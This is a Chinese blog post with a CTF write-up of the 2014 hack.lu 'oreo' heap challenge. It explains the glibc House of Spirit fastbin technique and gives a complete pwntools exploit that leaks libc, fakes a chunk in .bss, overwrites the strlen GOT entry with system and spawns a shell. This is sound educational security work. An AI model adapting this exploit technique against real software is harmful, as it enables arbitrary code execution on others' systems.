【PWN · heap | House Of Spirit】2014_hack.lu_oreo

最新推荐文章于 2024-02-11 13:31:42 发布
最新推荐文章于 2024-02-11 13:31:42 发布
阅读量945 收藏 17
点赞数 20
分类专栏: 【PWN · Heap】 文章标签: ctf pwn 劫持GOT heap House Of Spirit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/136037893
版权

呜呜呜,时隔多个月,继续学pwn

目录

前言

零、House Of Spirit介绍

一、题目分析

二、调试过程

1.泄露libc

2.大量add设置fake chunk的size合法

3.message 构造fake chunk的next chunk合法,绕过检测

4.order释放,将fake chunk放到fast bin中,等待add返回

5.修改notice指针,指向got表

6.通过message,修改notice指向的区域(got表,这里是strlen的got表)

三、exp 

前言

将chunk劫持到指定位置,能够大有作为,而House Of Spirit的目的就是这一点。最初了解仅是了解,通过本题,对于利用手法的利用,感悟更为深入。

零、House Of Spirit介绍

House of Spirit 是 the Malloc Maleficarum 中的一种技术。

该技术的核心在于在目标位置处伪造 fastbin chunk,并将其释放,从而达到分配指定地址的 chunk 的目的。

要想构造 fastbin fake chunk,并且将其释放时,可以将其放入到对应的 fastbin 链表中,需要绕过一些必要的检测,即

  • 1、fake chunk 的 ISMMAP 位不能为 1,因为 free 时,如果是 mmap 的 chunk,会单独处理 IS_MAPPED,记录当前 chunk 是否是由 mmap 分配的,这个标志位位于size低二比特位
  • 2、fake chunk 地址需要对齐, MALLOC_ALIGN_MASK 因为fake_chunk可以在任意可写位置构造,这里对齐指的是地址上的对齐而不仅仅是内存对齐,比如32位程序的话fake_chunk的prev_size所在地址就应该位0xXXXX0或0xXXXX4。64位的话地址就应该在0xXXXX0或0xXXXX8
  • 3、fake chunk 的 size 大小需要满足对应的 fastbin 的需求,同时也得对齐 fake_chunk如果想挂进fastbin的话构造的大小就不能大于0x80,关于对齐和上面一样,并且在确定prev_size的位置后size所在位置要满足堆块结构的摆放位置
  • 4、fake chunk 的 next chunk 的大小不能小于 2 * SIZE_SZ,同时也不能大于av->system_mem fake_chunk 的大小,大小必须是 2 * SIZE_SZ 的整数倍。如果申请的内存大小不是 2 * SIZE_SZ 的整数倍,会被转换满足大小的最小的 2 * SIZE_SZ 的倍数。32 位系统中,SIZE_SZ 是 4;64 位系统中,SIZE_SZ 是 8。最大不能超过av->system_mem,即128kb。next_chunk的大小一般我们会设置成为一个超过fastbin最大的范围的一个数,但要小雨128kb,这样做的目的是在chunk连续释放的时候,能够保证伪造的chunk在释放后能够挂在fastbin中main_arena的前面,这样以来我们再一次申请伪造chunk大小的块时可以直接重启伪造chunk
  • 5、fake chunk 对应的 fastbin 链表头部不能是该 fake chunk,即不能构成 double free 的情况 这个检查就是fake_chunk前一个释放块不能是fake_chunk本身,如果是的话_int_free函数就会检查出来并且中断

想要使用该技术分配 chunk 到指定地址,其实并不需要修改指定地址的任何内容,关键是要能够修改指定地址的前后的内容使其可以绕过对应的检测

一、题目分析

首先查看保护信息

我们可以往劫持got表的方向考虑

(图片来自好好说话系列博客)

一方面,这种长度可以控制物理临近chunk的控制字段;然而不可忽视的是,如果结构中有关键指针,通过溢出覆盖指针位为指定值,则很有可能得到任意地址读写执行等效果。

实际上,next就是一个指针,起到的效果是,将一块块申请到的rifle结构体,以链接的形式存储。next指向下一块结构体。

该怎么利用呢?不妨先看看其他功能。

free会将链接起来的结构体全部free,直到遇到next=NULL

结合main函数中对notice的赋值

因此,不难发现,最初的notice指针,是往临近自己的一块全局变量数组区域中,写信息。

再看看其他函数功能

试想我们能够伪造结构体指针,那么就可以把结构体指针指向区域偏移0x0和偏移0x19的地方连续读取信息。

show_state函数似乎没什么用,但是其中涉及到的变量——rifle_cnt以及order_num分别在add和order时自增1。或者说,这两个值的大小,我们愿意的话,是可以被我们控制的!

不容忽视的是,这两个全局变量,在内存布局上和其他全局变量的位置关系!

对整个程序有了基本了解之后,我们考虑如何劫持got表。

  1. libc如何泄露?(获得system、binsh)
  2. 如何修改?

泄露需要读权限——伪造结构体指针?!

修改——①message指针具有写权限 ②结构体指针在创建时具有写权限

综上,可以利用House Of Spirit手法,实现上述目标。

大致流程如下

  1. 泄露libc:利用创建结构体时的堆溢出漏洞,覆盖next指针为got表地址,这样在show_rifle时,会将最后一个next指针指向的区域,也即got表内容泄露出来
  2. 修改got表:
    1. 由于order_num、rifle_cnt、notice、unk_804a2c0这四个全局变量的位置关系,以及本身特性,可以构造fake chunk
    2. 首先将rifle_cnt的值通过反复add,控制到指定大小(0x41)作为fake chunk的size域。
    3. 再add一个结构体,并通过溢出修改next指针为fake chunk区域,具体位置详见d
    4. 为了链条free时,free fake chunk 有效,还需要将fake chunk的next chunk的size域控制到合理大小,而message具有写权限,且由于相对距离关系,可以通过message来构造
      1. 注意:fake chunk的next域需要设为NULL!当时卡了好久
      2. fake chunk的next域需要大小不能小于 2 * SIZE_SZ,同时也不能大于av->system_mem
    5. 通过order free掉所有结构体,注意,最后一个被free的结构体是构造的fake chunk!
    6. 通过add,可以获取fake chunk,注意,此时fake chunk是在bss段上,且创建时具有的写权限,可以修改notice值!——这就好比notice所在的指针具有写权限,而notice是手,我们可以控制手的位置,实现任意地址写的权限!——通过add时复写notice值为got表地址
    7. 然后再次通过message,实现修改got表的目的。

至此,可通过键入b’/bin/sh\x00’来getshell!

二、调试过程

细致地了解,每一步发生什么,最终getshell,对于整体的理解,是非常重要的。

这是一个很美妙的过程,

1.泄露libc

2.大量add设置fake chunk的size合法

3.message 构造fake chunk的next chunk合法,绕过检测

4.order释放,将fake chunk放到fast bin中,等待add返回

5.修改notice指针,指向got表

6.通过message,修改notice指向的区域(got表,这里是strlen的got表)

这是因为,修改为 p32(system)+b';/bin/sh\x00'

已经通过构造的system(’/bin/sh\x00’),getshell

三、exp

from pwn import *
from LibcSearcher import *
context(arch='i386',log_level='debug')

io=process('./pwn')
elf=ELF('./pwn')
def add(name,description):
    # io.recvuntil(b'Action:')
    io.sendline(b'1')
    io.sendline(name)
    io.sendline(description)
def show_rifles():
    # io.recvuntil(b'Action:')
    io.sendline(b'2')
def free_order():
    # io.recvuntil(b'Action:')
    io.sendline(b'3')
def message(msg):
    io.sendline(b'4')
    io.sendline(msg)
gdb.attach(io);input('[+]gdb attached!')

#########泄露libc
puts_got=elf.got['puts']
add(b'a'*27+p32(puts_got),b'leak libc')
show_rifles()
puts_real=u32(io.recvuntil(b'\xf7')[-4:])
success('puts:'+hex(puts_real))
libc=LibcSearcher('puts',puts_real)
libc_base=puts_real-libc.dump('puts')
system=libc_base+libc.dump('system')
binsh=libc_base+libc.dump('str_bin_sh')
success('system:'+hex(system))
success('binsh:'+hex(binsh))
input('[!]check!')

#########控制size字段
head=0x804A288 
rifle_cnt=0x804A2A4 
for i in range(0x40-1):
    # add(b'a'*27+p32(0),b'b')
    add(b'a',b'padding')
add(b'a'*27+p32(rifle_cnt+4),b'b')
input('[!]check!')

#########控制next chunk字段,合法绕过检测
payload=b'a'*(0x38-(0x804A2C0-0x804A2A8)-0x4)+p32(0)+p32(0)+p32(0x41)
message(payload)
input('[!]check!')

#########将fake chunk放到fastbin中
free_order()
input('[!]check!')

#########修改notice指针,指向strlen_got
add(b'a',p32(elf.got['strlen']))
input('[!]check!')

#########劫持got表为system,并输入/bin/sh\x00参数
message(p32(system)+b';/bin/sh\x00')
input('[!]check!!')

#########getshell!!!
io.interactive()
linux 堆溢出学习之house of spirit(1) malloc maleficarum hos翻译
jmp esp
03-02 2320
综述house of spirit是一种常用的堆溢出技术,而在如今的malloc实现中依然没有对这种方法进行保护,所以在目前还是一种有效的堆溢出技术。下面我们先从这种方法的来源之本讲起,即2005 Malloc Maleficarumcsdn原文 The House of SpiritThe House of Spirit is primarily interesting because of th
pwn工具箱之house of spirit
jmp esp
07-03 990
house of spirit基本信息 利用种类:堆利用 堆利用种类:释放fake chunk 利用思路:通过构造fake chunk,然后使得fake chunk被free,在下一次malloc时返回fake chunk 利用难点 需要能够控制被free的内容,才能构造fake chunk 在free fake chunk的时候,libc会检查next size,也就是从当前位置开始算,加上一个c
house-of-spirit-pwn200
csdn546229768的博客
01-11 2615
前言 : 因为期末考试加上复习的原因,接近一个月没有做pwn题了,放寒假就回来在物理机上面装了个ubuntu(折腾了几天,不过装好了做题环境还是挺好用的),打算这个寒假学习完堆知识.来年好好上课(大三压力大!)有空打打比赛. 例题 : lctf2016_pwn200 house-of-spirit 利用条件: (1)想要控制的目标区域的上方空间与下方空间都是可控的内存区域 (2)存在可将堆变量指针覆盖指向为上方可控空间,从而达到将非可控空间与可控空间进行合并变成fake_chunk(有点像unlink) (
House of Spirit(fastbin)
weixin_30265171的博客
07-14 188
0x01 fastbin fastbin所包含chunk的大小为16 Bytes, 24 Bytes, 32 Bytes, … , 80 Bytes。当分配一块较小的内存(mem<=64 Bytes)时,会首先检查对应大小的fastbin中是否包含未被使用的chunk,如果存在则直接将其从fastbin中移除并返回;否则通过其他方式(剪切top chunk)得到一块符合大小要求的chunk...
LCTF 2016 PWN200(House Of Spirit)
Bill
03-24 1766
L-CTF 2016 pwn200 漏洞简介 The house of Spirit The House of Spirit is a little different from other attacks in the sense that it involves an attacker overwriting an existing pointer before it is ‘fr...
6.house_of_spirit
06-08 153
源代码 1 #include <stdio.h> 2 #include <stdlib.h> 3 4 int main() 5 { 6 fprintf(stderr, "This file demonstrates the house of spirit attack.\n"); 7 8 fprintf(st...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
各种乱七八糟的收集,_51pwn.com大数据平台模糊查询_MyDocs.zip
09-16
标题“各种乱七八糟的收集,_51pwn.com大数据平台模糊查询_MyDocs.zip”中包含了几个关键信息点:“各种乱七八糟的收集”、“51pwn.com”、“大数据平台”、“模糊查询”以及“文档集合(MyDocs)”。尽管没有具体的...
A pwn challenge in 2022 美团高校赛_2.zip
02-20
首先,文件标题“A pwn challenge in 2022 美团高校赛_2.zip”表明这是一个与计算机安全领域相关的挑战赛文件包。Pwn在信息安全领域通常指的是“Own”,即控制或攻破计算机系统,这是一个常用于描述信息安全竞赛中的...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
A pwn challenge in 2022 美团高校赛_1.zip
最新发布
02-20
标题中的“pwn challenge”通常指的是一个网络安全领域的竞赛或挑战,其中“pwn”在黑客术语中意味着取得对计算机系统的控制权。综合来看,这个压缩包可能包含了与网络安全竞赛相关的一些内容,例如挑战赛题目、解题...
[pwn][堆利用]house of spirit[例题:lctf2016_pwn200]
zhulintintao的博客
11-21 922
House of spirit 实现目的 malloc分配到目标地址 实现条件 free的参数可控 目标地址可以连续构造两个fake chunk的size域,需要地址对齐(即目标高低地址处均有可控区域) 实现方法 在目标地址伪造可以被释放到fastbin上的fake chunk 伪造fake chunk的同时伪造好其下一个chunk(物理上的)的size域 将目标地址作为参数free malloc一次,将返回指向目标地址的指针 实现实例 题目平台 buuctf 题目名
好好说话之Fastbin Attack(2):House Of Spirit
hollk’s blog
10-30 3827
Fastbin Attack的第二种攻击方式House Of Spirit,相对来说是double free的升华。在检查绕过的时候会相对麻烦一点,其他的地方还是挺简单的,如果上一篇文上你领悟的很好的话,这篇文章也不会很难理解。 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
PWN-HEAP学习】House of Spirit 学习笔记
SWEET0SWAT的博客
08-16 1619
House of Spirit 原理 l-ctf 2016 pwn200 调试分析 0x7ffd4a390b10: 0x0000000000000031 0x0000003000000001 0x7ffd4a390b20: 0x00007ffd4a390b40 0x00000000004009ff 0x7ffd4a390b30: 0x0000000000000005 0x0000000188ff...
GDB调试堆漏洞之house of spirit
ZL_1618的博客
08-14 873
何为house of spirit?​ 该技术出自于2005年的The MallocMaleficarum这篇文章,是一种用于获得某块内存区域控制权的技术 ​例如一个位于fastbin的区块是不可控的,但是我们希望对其进行读写操作只需他刚好满足以下两个条件即可。​第一,改区域的前后内存可控(通俗来讲就是堆溢出) ​ 第二,存在一个可控指针作为free()函数的参数(此处通俗讲就是控制chunk的fd或者bk指针),通过堆排布, ​ 伪造fake。
House of Spirit学习调试验证与实践
xiaoi123的博客
08-07 1177
作家:Bug制造机 原文来自:House of Spirit学习调试验证与实践 House of Spirit和其他的堆的利用手段有所不同。它是将存在的指针改写指向我们伪造的块(这个块可以位于堆、栈、bss任何一个位置)并且free掉欺骗glibc达到把伪造块回收到bins中不过在free之前,需要设置当前伪造块和下一个伪造块的size字段,满足free()的安全检测机制,从而欺骗glibc。...
house_of_spirit && 2014_hack.lu_oreo例题分析
Pwnpanda的博客
08-13 1312
2014_hack.lu_oreo 相关知识点: Fastbin Attack – House of Spirit 相关链接: 2014_hack.lu_oreo下载 CTF Wiki Fastbin Attack IDA创建结构体 题目分析: 先分析功能: ①添加枪支(add),这个地方会读取枪支的名字和描述,这是第一个难点,这个里面存在一个结构体(差点被坑死在这,为...
fastbin attack
m0_64195960的博客
07-19 1463
FastbinDoubleFree是指fastbin的chunk可以被多次释放,因此可以在fastbin链表中存在多次。这样导致的后果是多次分配可以从fastbin链表中取出同一个堆块,相当于多个指针指向同一个堆块,结合堆块的数据内容可以实现类似于类型混淆(typeconfused)的效果。FastbinDoubleFree能够成功利用主要有两部分的原因fastbin的堆块被释放后next_chunk的pre_inuse位不会被清空1.1.1该技术的核心。......
从零开始学howtoheap:fastbins的house_of_spirit攻击2
weixin_44626085的博客
02-11 1045
how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来学习。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值